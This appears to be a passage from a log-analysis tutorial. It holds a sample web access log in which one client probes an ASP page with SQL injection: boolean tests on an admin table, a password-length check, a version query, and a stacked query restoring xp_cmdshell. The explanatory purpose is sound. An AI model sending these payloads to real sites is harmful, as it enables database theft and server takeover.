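SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2020:10:01:02 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5123
203.0.113.7 - - [10/May/2020:10:01:09 +0000] "GET /news.asp?id=12%20and%201=(select%20count(*)%20from%20admin) HTTP/1.1" 200 5123
203.0.113.7 - - [10/May/2020:10:01:15 +0000] "GET /news.asp?id=12%20and%201=(select%20count(*)%20from%20admin%20where%20len(password)%3E11)-- HTTP/1.1" 200 5123
203.0.113.7 - - [10/May/2020:10:02:40 +0000] "GET /news.asp?id=12%20and%201=(select%20@@VERSION)-- HTTP/1.1" 500 1204
203.0.113.7 - - [10/May/2020:10:03:01 +0000] "GET /news.asp?id=12;EXEC%20master.dbo.sp_addextendedproc%20'xp_cmdshell','xplog70.dll'-- HTTP/1.1" 500 1204
198.51.100.4 - - [10/May/2020:10:03:30 +0000] "GET /about.asp HTTP/1.1" 200 2210
"""
```

The status column is kept in the result on purpose: the alternating 200/500 responses to otherwise identical requests are the "correct page / error page" oracle the section relies on, and they are as telling as the decoded SQL itself.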